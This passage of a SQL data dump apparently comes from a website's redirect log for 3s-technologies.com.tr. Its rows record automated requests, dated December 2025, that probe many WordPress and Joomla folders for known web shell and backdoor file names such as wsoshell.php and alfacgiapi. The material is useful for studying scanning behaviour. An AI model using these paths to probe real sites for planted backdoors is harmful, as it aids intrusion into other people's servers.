00:00:00',301),(53600,'http://3s-technologies.com.tr/en/wp-admin/includes/class_appfun.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:31:04','0000-00-00 00:00:00',301),(53601,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/class_appfun.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:31:05','0000-00-00 00:00:00',301),(53602,'http://3s-technologies.com.tr/en/wp-admin/js/class_appfun.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:31:06','0000-00-00 00:00:00',301),(53603,'http://3s-technologies.com.tr/en/wp-admin/maint/class_appfun.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:31:07','0000-00-00 00:00:00',301),(53604,'http://3s-technologies.com.tr/en/wp-admin/network/class_appfun.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:31:08','0000-00-00 00:00:00',301),(53605,'http://3s-technologies.com.tr/en/wp-admin/user/class_appfun.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:31:09','0000-00-00 00:00:00',301),(53606,'http://3s-technologies.com.tr/en/wp-content/class_appfun.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:31:10','0000-00-00 00:00:00',301),(53607,'http://3s-technologies.com.tr/en/wp-content/uploads/class_appfun.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:31:11','0000-00-00 00:00:00',301),(53608,'http://3s-technologies.com.tr/en/wp-content/plugins/class_appfun.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:31:12','0000-00-00 00:00:00',301),(53609,'http://3s-technologies.com.tr/en/wp-content/languages/class_appfun.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:31:13','0000-00-00 00:00:00',301),(53610,'http://3s-technologies.com.tr/en/wp-content/languages/themes/class_appfun.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:31:14','0000-00-00 00:00:00',301),(53611,'http://3s-technologies.com.tr/en/wp-includes/simplepie/class_appfun.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:31:15','0000-00-00 00:00:00',301),(53612,'http://3s-technologies.com.tr/en/wp-includes/certificates/class_appfun.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:31:15','0000-00-00 00:00:00',301),(53613,'http://3s-technologies.com.tr/en/wp-includes/customize/class_appfun.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:31:16','0000-00-00 00:00:00',301),(53614,'http://3s-technologies.com.tr/en/class.curl.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:31:17','0000-00-00 00:00:00',301),(53615,'http://3s-technologies.com.tr/en/user-edit.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:31:18','0000-00-00 00:00:00',301),(53616,'http://3s-technologies.com.tr/en/class-ftp-pures.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:31:19','0000-00-00 00:00:00',301),(53617,'http://3s-technologies.com.tr/en/cy.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:31:21','0000-00-00 00:00:00',301),(53618,'http://3s-technologies.com.tr/en/cylul.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:31:26','0000-00-00 00:00:00',301),(53619,'http://3s-technologies.com.tr/en/fx-mini.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:31:27','0000-00-00 00:00:00',301),(53620,'http://3s-technologies.com.tr/en/wsoshell.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:31:30','0000-00-00 00:00:00',301),(53621,'http://3s-technologies.com.tr/en/defaul.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:31:31','0000-00-00 00:00:00',301),(53622,'http://3s-technologies.com.tr/en/wp-functions.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:31:33','0000-00-00 00:00:00',301),(53623,'http://3s-technologies.com.tr/en/wp_fma.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:31:34','0000-00-00 00:00:00',301),(53624,'http://3s-technologies.com.tr/en/text.php',NULL,'https://www.google.com/','',9,0,'2025-12-20 05:31:35','0000-00-00 00:00:00',301),(53625,'http://3s-technologies.com.tr/en/alfaaneh.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:31:36','0000-00-00 00:00:00',301),(53626,'http://3s-technologies.com.tr/en/wp_mna.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:31:37','0000-00-00 00:00:00',301),(53627,'http://3s-technologies.com.tr/en/vv.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:31:39','0000-00-00 00:00:00',301),(53628,'http://3s-technologies.com.tr/en/orange.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:31:39','0000-00-00 00:00:00',301),(53629,'http://3s-technologies.com.tr/en/en.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:31:40','0000-00-00 00:00:00',301),(53630,'http://3s-technologies.com.tr/en/upgrade.php',NULL,'https://duckduckgo.com/','',3,0,'2025-12-20 05:31:42','0000-00-00 00:00:00',301),(53631,'http://3s-technologies.com.tr/en/wg.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:31:43','0000-00-00 00:00:00',301),(53632,'http://3s-technologies.com.tr/en/antiheker.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:31:44','0000-00-00 00:00:00',301),(53633,'http://3s-technologies.com.tr/en/wp-contact.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:31:45','0000-00-00 00:00:00',301),(53634,'http://3s-technologies.com.tr/en/pler.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:31:46','0000-00-00 00:00:00',301),(53635,'http://3s-technologies.com.tr/en/js.php',NULL,'https://www.google.co.uk/','',3,0,'2025-12-20 05:31:47','0000-00-00 00:00:00',301),(53636,'http://3s-technologies.com.tr/en/bypass403.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:31:48','0000-00-00 00:00:00',301),(53637,'http://3s-technologies.com.tr/en/wp-aespa.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:31:49','0000-00-00 00:00:00',301),(53638,'http://3s-technologies.com.tr/en/1313.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:31:50','0000-00-00 00:00:00',301),(53639,'http://3s-technologies.com.tr/en/cyl.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:31:52','0000-00-00 00:00:00',301),(53640,'http://3s-technologies.com.tr/en/wp-2018.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:31:57','0000-00-00 00:00:00',301),(53641,'http://3s-technologies.com.tr/en/wp-2017.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:31:58','0000-00-00 00:00:00',301),(53642,'http://3s-technologies.com.tr/en/style-js.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:31:59','0000-00-00 00:00:00',301),(53643,'http://3s-technologies.com.tr/en/login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:31:59','0000-00-00 00:00:00',301),(53644,'http://3s-technologies.com.tr/en/remove.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:32:00','0000-00-00 00:00:00',301),(53645,'http://3s-technologies.com.tr/en/obfbyte.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:32:01','0000-00-00 00:00:00',301),(53646,'http://3s-technologies.com.tr/en/zzz.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:32:02','0000-00-00 00:00:00',301),(53647,'http://3s-technologies.com.tr/en/licenses.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:32:05','0000-00-00 00:00:00',301),(53648,'http://3s-technologies.com.tr/en/bps.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:06','0000-00-00 00:00:00',301),(53649,'http://3s-technologies.com.tr/en/library.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:32:07','0000-00-00 00:00:00',301),(53650,'http://3s-technologies.com.tr/en/wp-root.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:32:07','0000-00-00 00:00:00',301),(53651,'http://3s-technologies.com.tr/en/wp-.myluv.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:32:08','0000-00-00 00:00:00',301),(53652,'http://3s-technologies.com.tr/en/wp-users.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:09','0000-00-00 00:00:00',301),(53653,'http://3s-technologies.com.tr/en/wp-menu.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:10','0000-00-00 00:00:00',301),(53654,'http://3s-technologies.com.tr/en/88.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:32:11','0000-00-00 00:00:00',301),(53655,'http://3s-technologies.com.tr/en/bypass404.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:32:12','0000-00-00 00:00:00',301),(53656,'http://3s-technologies.com.tr/en/back.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:32:13','0000-00-00 00:00:00',301),(53657,'http://3s-technologies.com.tr/en/priv01.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:32:14','0000-00-00 00:00:00',301),(53658,'http://3s-technologies.com.tr/en/meki.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:32:15','0000-00-00 00:00:00',301),(53659,'http://3s-technologies.com.tr/en/gecko-new.php',NULL,'https://www.bing.com/','',23,0,'2025-12-20 05:32:16','0000-00-00 00:00:00',301),(53660,'http://3s-technologies.com.tr/en/303.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:18','0000-00-00 00:00:00',301),(53661,'http://3s-technologies.com.tr/en/sample-config-options.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:32:19','0000-00-00 00:00:00',301),(53662,'http://3s-technologies.com.tr/en/wp-config-samsples.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:32:19','0000-00-00 00:00:00',301),(53663,'http://3s-technologies.com.tr/en/clay.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:32:21','0000-00-00 00:00:00',301),(53664,'http://3s-technologies.com.tr/en/forbiden.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:32:22','0000-00-00 00:00:00',301),(53665,'http://3s-technologies.com.tr/en/class-wp.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:32:23','0000-00-00 00:00:00',301),(53666,'http://3s-technologies.com.tr/en/curme.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:32:24','0000-00-00 00:00:00',301),(53667,'http://3s-technologies.com.tr/en/xdoor.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:32:25','0000-00-00 00:00:00',301),(53668,'http://3s-technologies.com.tr/en/joy.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:26','0000-00-00 00:00:00',301),(53669,'http://3s-technologies.com.tr/en/ri.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:32:27','0000-00-00 00:00:00',301),(53670,'http://3s-technologies.com.tr/en/cd.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:32:28','0000-00-00 00:00:00',301),(53671,'http://3s-technologies.com.tr/en/on-settingssl.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:32:29','0000-00-00 00:00:00',301),(53672,'http://3s-technologies.com.tr/en/db.php',NULL,'https://duckduckgo.com/','',17,0,'2025-12-20 05:32:30','0000-00-00 00:00:00',301),(53673,'http://3s-technologies.com.tr/en/wp-del.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:32:30','0000-00-00 00:00:00',301),(53674,'http://3s-technologies.com.tr/en/makesmtp.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:32:31','0000-00-00 00:00:00',301),(53675,'http://3s-technologies.com.tr/en/stylec.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:33','0000-00-00 00:00:00',301),(53676,'http://3s-technologies.com.tr/en/ticket.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:32:34','0000-00-00 00:00:00',301),(53677,'http://3s-technologies.com.tr/en/401.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:32:35','0000-00-00 00:00:00',301),(53678,'http://3s-technologies.com.tr/en/405.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:32:36','0000-00-00 00:00:00',301),(53679,'http://3s-technologies.com.tr/en/scn.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:38','0000-00-00 00:00:00',301),(53680,'http://3s-technologies.com.tr/en/lowpr.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:32:39','0000-00-00 00:00:00',301),(53681,'http://3s-technologies.com.tr/en/63ck0.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:32:40','0000-00-00 00:00:00',301),(53682,'http://3s-technologies.com.tr/en/pda.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:41','0000-00-00 00:00:00',301),(53683,'http://3s-technologies.com.tr/en/danci.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:42','0000-00-00 00:00:00',301),(53684,'http://3s-technologies.com.tr/en/fse.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:43','0000-00-00 00:00:00',301),(53685,'http://3s-technologies.com.tr/en/anonym.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:32:44','0000-00-00 00:00:00',301),(53686,'http://3s-technologies.com.tr/en/lock.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:44','0000-00-00 00:00:00',301),(53687,'http://3s-technologies.com.tr/en/demos.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:32:45','0000-00-00 00:00:00',301),(53688,'http://3s-technologies.com.tr/en/demon.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:46','0000-00-00 00:00:00',301),(53689,'http://3s-technologies.com.tr/en/clan.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:32:48','0000-00-00 00:00:00',301),(53690,'http://3s-technologies.com.tr/en/fdbxhriw.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:32:49','0000-00-00 00:00:00',301),(53691,'http://3s-technologies.com.tr/en/kontoru.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:32:50','0000-00-00 00:00:00',301),(53692,'http://3s-technologies.com.tr/en/1111.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:32:51','0000-00-00 00:00:00',301),(53693,'http://3s-technologies.com.tr/en/lyda.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:32:53','0000-00-00 00:00:00',301),(53694,'http://3s-technologies.com.tr/en/bbb.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:32:55','0000-00-00 00:00:00',301),(53695,'http://3s-technologies.com.tr/en/zz.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:32:56','0000-00-00 00:00:00',301),(53696,'http://3s-technologies.com.tr/en/blue.php',NULL,'https://www.google.de/','',3,0,'2025-12-20 05:32:59','0000-00-00 00:00:00',301),(53697,'http://3s-technologies.com.tr/en/fast.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:33:01','0000-00-00 00:00:00',301),(53698,'http://3s-technologies.com.tr/en/ipt.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:33:02','0000-00-00 00:00:00',301),(53699,'http://3s-technologies.com.tr/en/wp-pluging.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:33:06','0000-00-00 00:00:00',301),(53700,'http://3s-technologies.com.tr/en/wp-mails.ph',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:33:06','0000-00-00 00:00:00',301),(53701,'http://3s-technologies.com.tr/en/aab.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:33:10','0000-00-00 00:00:00',301),(53702,'http://3s-technologies.com.tr/en/kuda.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:33:11','0000-00-00 00:00:00',301),(53703,'http://3s-technologies.com.tr/en/kii.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:33:12','0000-00-00 00:00:00',301),(53704,'http://3s-technologies.com.tr/en/main.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:33:14','0000-00-00 00:00:00',301),(53705,'http://3s-technologies.com.tr/en/nshell.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:33:16','0000-00-00 00:00:00',301),(53706,'http://3s-technologies.com.tr/en/yuki.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:33:21','0000-00-00 00:00:00',301),(53707,'http://3s-technologies.com.tr/en/wp-phpinfo.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:33:29','0000-00-00 00:00:00',301),(53708,'http://3s-technologies.com.tr/en/mt/ninja.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:33:33','0000-00-00 00:00:00',301),(53709,'http://3s-technologies.com.tr/en/link.php/wp-atom.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:33:35','0000-00-00 00:00:00',301),(53710,'http://3s-technologies.com.tr/en/wp-includes/rest-api/fields/cache/simple.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:33:36','0000-00-00 00:00:00',301),(53711,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/image/index.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:33:37','0000-00-00 00:00:00',301),(53712,'http://3s-technologies.com.tr/en/alfa_data/alfacgiapi',NULL,'https://www.google.com/','',14,0,'2025-12-20 05:33:38','0000-00-00 00:00:00',301),(53713,'http://3s-technologies.com.tr/en/wp-includes/style.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:33:40','0000-00-00 00:00:00',301),(53714,'http://3s-technologies.com.tr/en/wp-content/uploads/style.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:33:40','0000-00-00 00:00:00',301),(53715,'http://3s-technologies.com.tr/en/wp-admin/js/user-suggest.js',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:33:41','0000-00-00 00:00:00',301),(53716,'http://3s-technologies.com.tr/en/wp-content/style.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:33:43','0000-00-00 00:00:00',301),(53717,'http://3s-technologies.com.tr/en/wp-includes/js/admin-bar.js',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:33:44','0000-00-00 00:00:00',301),(53718,'http://3s-technologies.com.tr/en/wp-admin/images/wp-ver.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:33:46','0000-00-00 00:00:00',301),(53719,'http://3s-technologies.com.tr/en/wp-admin/includes/wp-ver.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:33:47','0000-00-00 00:00:00',301),(53720,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/wp-ver.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:33:48','0000-00-00 00:00:00',301),(53721,'http://3s-technologies.com.tr/en/wp-admin/js/wp-ver.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:33:49','0000-00-00 00:00:00',301),(53722,'http://3s-technologies.com.tr/en/wp-admin/maint/wp-ver.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:33:50','0000-00-00 00:00:00',301),(53723,'http://3s-technologies.com.tr/en/wp-admin/network/wp-ver.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:33:50','0000-00-00 00:00:00',301),(53724,'http://3s-technologies.com.tr/en/wp-admin/user/wp-ver.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:33:51','0000-00-00 00:00:00',301),(53725,'http://3s-technologies.com.tr/en/wp-content/wp-ver.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:33:52','0000-00-00 00:00:00',301),(53726,'http://3s-technologies.com.tr/en/wp-content/uploads/wp-ver.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:33:53','0000-00-00 00:00:00',301),(53727,'http://3s-technologies.com.tr/en/wp-content/languages/wp-ver.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:33:55','0000-00-00 00:00:00',301),(53728,'http://3s-technologies.com.tr/en/wp-content/languages/themes/wp-ver.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:33:56','0000-00-00 00:00:00',301),(53729,'http://3s-technologies.com.tr/en/wp-includes/simplepie/wp-ver.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:33:57','0000-00-00 00:00:00',301),(53730,'http://3s-technologies.com.tr/en/wp-includes/certificates/wp-ver.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:33:57','0000-00-00 00:00:00',301),(53731,'http://3s-technologies.com.tr/en/wp-includes/customize/wp-ver.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:33:58','0000-00-00 00:00:00',301),(53732,'http://3s-technologies.com.tr/en/wp-includes/pomo/wp-ver.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:33:59','0000-00-00 00:00:00',301),(53733,'http://3s-technologies.com.tr/en/wp-includes/rest-api/wp-ver.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:34:00','0000-00-00 00:00:00',301),(53734,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/wp-ver.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:34:01','0000-00-00 00:00:00',301),(53735,'http://3s-technologies.com.tr/en/index/wp-ver.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:34:02','0000-00-00 00:00:00',301),(53736,'http://3s-technologies.com.tr/en/about/wp-ver.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:34:03','0000-00-00 00:00:00',301),(53737,'http://3s-technologies.com.tr/en/as/wp-ver.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:34:03','0000-00-00 00:00:00',301),(53738,'http://3s-technologies.com.tr/en/file/wp-ver.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:34:04','0000-00-00 00:00:00',301),(53739,'http://3s-technologies.com.tr/en/chosen/wp-ver.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:34:05','0000-00-00 00:00:00',301),(53740,'http://3s-technologies.com.tr/en/css/wp-ver.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:34:06','0000-00-00 00:00:00',301),(53741,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/wp-ver.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:34:07','0000-00-00 00:00:00',301),(53742,'http://3s-technologies.com.tr/en/email_v2/js/tiny_mce/plugins/ajaxfilemanager/wp-ver.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:34:08','0000-00-00 00:00:00',301),(53743,'http://3s-technologies.com.tr/en/jscript/tiny_mce/plugins/ajaxfilemanager/wp-ver.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:34:08','0000-00-00 00:00:00',301),(53744,'http://3s-technologies.com.tr/en/js/tiny_mce/plugins/ajaxfilemanager/wp-ver.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:34:09','0000-00-00 00:00:00',301),(53745,'http://3s-technologies.com.tr/en/tiny_mce/plugins/ajaxfilemanager/wp-ver.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:34:10','0000-00-00 00:00:00',301),(53746,'http://3s-technologies.com.tr/en/plugins/ajaxfilemanager/wp-ver.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:34:11','0000-00-00 00:00:00',301),(53747,'http://3s-technologies.com.tr/en/ajaxfilemanager/wp-ver.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:34:12','0000-00-00 00:00:00',301),(53748,'http://3s-technologies.com.tr/en/cms/tiny_mce/plugins/ajaxfilemanager/wp-ver.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:34:13','0000-00-00 00:00:00',301),(53749,'http://3s-technologies.com.tr/en/lockindex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:34:14','0000-00-00 00:00:00',301),(53750,'http://3s-technologies.com.tr/en/unlockindex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:34:15','0000-00-00 00:00:00',301),(53751,'http://3s-technologies.com.tr/en/styple.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:34:16','0000-00-00 00:00:00',301),(53752,'http://3s-technologies.com.tr/en/.well-known/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:34:19','0000-00-00 00:00:00',301),(53753,'http://3s-technologies.com.tr/en/components/com_newsfeeds/models/indexx.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:34:20','0000-00-00 00:00:00',301),(53754,'http://3s-technologies.com.tr/en/plugins/finder/categories/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:34:21','0000-00-00 00:00:00',301),(53755,'http://3s-technologies.com.tr/en/wp-content/data-db.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:34:22','0000-00-00 00:00:00',301),(53756,'http://3s-technologies.com.tr/en/revision.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:34:23','0000-00-00 00:00:00',301),(53757,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-help',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:34:25','0000-00-00 00:00:00',301),(53758,'http://3s-technologies.com.tr/en/yanzshell.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:34:26','0000-00-00 00:00:00',301),(53759,'http://3s-technologies.com.tr/en/wp-content/alfa_data/alfacgiapi',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:34:27','0000-00-00 00:00:00',301),(53760,'http://3s-technologies.com.tr/en/alfa_data/alfa_data/alfacgiapi',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:34:28','0000-00-00 00:00:00',301),(53761,'http://3s-technologies.com.tr/en/wp-content/patior',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:34:30','0000-00-00 00:00:00',301),(53762,'http://3s-technologies.com.tr/en/wp-includes/requests/text',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:34:31','0000-00-00 00:00:00',301),(53763,'http://3s-technologies.com.tr/en/wp-content/plugins/seoplugins/db.php',NULL,'https://www.google.fr/','',4,0,'2025-12-20 05:34:32','0000-00-00 00:00:00',301),(53764,'http://3s-technologies.com.tr/en/wp-content/themes/noriumportfolio/db.php',NULL,'https://www.bing.com/','',4,0,'2025-12-20 05:34:32','0000-00-00 00:00:00',301),(53765,'http://3s-technologies.com.tr/en/wp-content/themes/seotheme/db.php',NULL,'https://duckduckgo.com/','',10,0,'2025-12-20 05:34:35','0000-00-00 00:00:00',301),(53766,'http://3s-technologies.com.tr/en/wp-content/themes/workart/db.php',NULL,'https://www.bing.com/','',4,0,'2025-12-20 05:34:36','0000-00-00 00:00:00',301),(53767,'http://3s-technologies.com.tr/en/wp-content/plugins/virr/uploader.php',NULL,'https://www.google.fr/','',4,0,'2025-12-20 05:34:37','0000-00-00 00:00:00',301),(53768,'http://3s-technologies.com.tr/en/wp-content/themes/rishi/db.php',NULL,'https://www.bing.com/','',4,0,'2025-12-20 05:34:38','0000-00-00 00:00:00',301),(53769,'http://3s-technologies.com.tr/en/wp-content/outcms.php',NULL,'https://www.bing.com/','',4,0,'2025-12-20 05:34:38','0000-00-00 00:00:00',301),(53770,'http://3s-technologies.com.tr/en/wp-content/themes/skatepark/db.php',NULL,'https://www.google.de/','',4,0,'2025-12-20 05:34:39','0000-00-00 00:00:00',301),(53771,'http://3s-technologies.com.tr/en/wp-content/plugins/linkpreview/db.php',NULL,'https://duckduckgo.com/','',4,0,'2025-12-20 05:34:41','0000-00-00 00:00:00',301),(53772,'http://3s-technologies.com.tr/en/wp-content/plugins/db/uploader.php',NULL,'https://www.google.de/','',4,0,'2025-12-20 05:34:42','0000-00-00 00:00:00',301),(53773,'http://3s-technologies.com.tr/en/wp-content/themes/jobart/db.php',NULL,'https://www.google.co.uk/','',4,0,'2025-12-20 05:34:43','0000-00-00 00:00:00',301),(53774,'http://3s-technologies.com.tr/en/wp-content/plugins/seoplugin/db.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:34:44','0000-00-00 00:00:00',301),(53775,'http://3s-technologies.com.tr/en/wp-content/themes/pridmag/db.php',NULL,'https://www.yahoo.com/','',8,0,'2025-12-20 05:34:45','0000-00-00 00:00:00',301),(53776,'http://3s-technologies.com.tr/en/css',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:34:46','0000-00-00 00:00:00',301),(53777,'http://3s-technologies.com.tr/en/link.php',NULL,'https://www.google.de/','',23,0,'2025-12-20 05:34:49','0000-00-00 00:00:00',301),(53778,'http://3s-technologies.com.tr/en/wp-admin/images/classwithtostring.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:34:50','0000-00-00 00:00:00',301),(53779,'http://3s-technologies.com.tr/en/wp-admin/includes/classwithtostring.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:34:50','0000-00-00 00:00:00',301),(53780,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/classwithtostring.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:34:51','0000-00-00 00:00:00',301),(53781,'http://3s-technologies.com.tr/en/wp-admin/js/classwithtostring.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:34:52','0000-00-00 00:00:00',301),(53782,'http://3s-technologies.com.tr/en/wp-admin/maint/classwithtostring.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:34:53','0000-00-00 